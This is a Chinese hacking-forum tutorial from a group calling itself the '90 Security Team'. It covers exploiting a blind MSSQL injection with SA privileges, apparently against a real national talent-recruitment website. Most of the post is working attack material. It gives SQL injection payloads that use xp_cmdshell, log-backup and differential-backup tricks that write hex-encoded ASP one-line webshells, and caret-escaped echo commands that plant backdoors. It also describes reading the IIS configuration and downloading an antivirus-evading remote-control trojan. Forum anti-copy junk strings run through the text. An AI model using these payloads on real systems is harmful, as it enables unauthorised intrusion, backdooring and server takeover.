sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
7 Z2 I5 _1 F5 q/ ~, E3 D0 V

8 h' Q" t+ E# W; B                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
' D8 h2 b- f( N% o0 T6 {
2 u4 O- y& ?# a% p7 p' E: V                                                                 
7 Y* z' u# n1 i+ `1 v9 z# R                                                                 
+ |1 I; s6 q: m5 {                                                                  论坛： http://www.90team.net/
  z/ X3 M" q& \  Y6 [3 D, `5 ?


友情检测国家人才网

- N. g  R# P4 L
内容：MSSQL注入SA权限不显错模式下的入侵

/ M9 p0 p5 `5 |8 \5 X7 b: R, H+ N0 |
" I/ m) {, W4 W5 T3 n+ o一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

, M* B4 |8 }- L! s我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。

3 i) [2 R9 e- U) m+ Z4 h/ `7 q( N
这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
. L6 l  l. Z& U* A# r
思路：
2 L; g! ]9 R4 b' B: l! s
/ i3 F6 t3 c. L! k/ ^. ?* Z首先：

通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
' T$ ~& |! u# l4 h7 r
1.日志备份获得Webshell

; P" C5 M# @1 h, i2.数据库差异备份获得Webshell
  R+ J! u& B0 v; R( N* {, ^" n. y
4.直接下载免杀远控木马。
" @3 F, Y4 ~6 M+ Q: i2 x/ F6 B
5.直接下载LCX将服务器端口转发出来

6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。

7 ?/ X- r# u, M& h

在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
! C) L% E) p; _; u+ y  B" N
4 P. k+ O- c2 b: O. ^; ~我直接演示后面一个方法

# _. G& E( n, n) i
8 \2 }6 Y% N' s/ u8 m; M分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL



# i* e) F' t6 {% t' m% _4 O' {
◆日志备份：


/ p$ k- O1 w  `5 ~+ E7 l8 `1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

2. 插入数据
5 J% l1 b1 y& @4 p;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
1 X5 e1 \1 N, a  G
( ^! k( q9 p+ _. x0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
6 b8 j6 ]5 R' q5 }: B. C3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
1 g8 q! i" y. u7 n- r, t4 e7 p

. E# f: O: v" U6 a! u/ A
◆数据库差异备份

4 L5 e! g7 H% s; B: s（1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
: Y$ j' @% ~2 M$ i" L
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
; J: [* V8 s3 v) Q; y* ]$ x

5 p3 w' b9 o0 H（2. 将数据写入到数据库
( G1 Q" b% g( z# p;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

% z+ H) {. [8 }6 O0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
" l8 k2 m; S$ L
! [0 g8 W+ h+ l& f+ p* ~4 \' v3. 备份数据库并清理临时文件
$ _1 U' G+ Q2 D: ?: U* B2 k! u6 I( c
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

+ S) i1 ~& c7 U% R+ l0x633A5C746573742E617370  为 c:\test.asp  删除临时文件


* a7 b+ H. l4 u; p; L7 k
; ]: ?; C. _" _+ C; a) q用^转义字符来写ASP(一句话木马)文件的方法:   
: a! Z3 H. Y3 I$ h' T3 \4 C  b+ n
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
, f- q3 J- K0 f/ J  s8 ]+ @
: G- L5 v4 C  S) c2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

7 D$ P, F6 T& }' o$ G/ {, v读取IIS配置信息获取web路径
1 x6 Q: B1 B% |) [, a
     
7 K; d+ N3 f6 A5 ~- |- e# B     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
1 q7 B* m3 X% `* f. x- L2 j) Y$ T, G( n
执行命令
$ Y3 ?- [) ]4 s1 F4 x, d     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--



+ D% S9 h5 f. d  u+ b* P7 x1 o" v


6 G0 D  f1 x+ t0 }


: }* X) z' V" h8 |5 T' `# L
8 g+ |# v# p- p8 t
  i  A3 M7 l/ A/ F
5 V& @  B% j8 M: h
, [5 S6 r) Q/ o! C2 _& l




% Y6 q  J0 O3 l) c( {
9 n, j( [2 B( P2 ^* f' P5 g+ e

/ S% ~  |5 c! ?2 f. ]) P
+ Q2 X" M/ n' e, O  T+ ~
5 ]- Y/ u5 E9 |: |; x9 n

7 g1 b  F! x6 Y0 e

6 R/ t2 @. o+ B7 W6 r: o

. {, B$ n, e( `. `6 n
6 G6 Z3 D; \% e8 c; ?



( X' L: D. e2 U& D  R5 j6 P- x
  G8 a7 Y1 s/ f* r
' B6 |* k- k$ _
' a. f$ b* H+ `5 }9 M. G9 C) V


. H4 i( \7 O; m) B


2 k$ {7 ]% O% }) g/ y
; [# }1 h* v) C
' d* w: l; S" r1 Q' d9 p0 P$ |9 M
  S( X5 v9 ^3 I; ?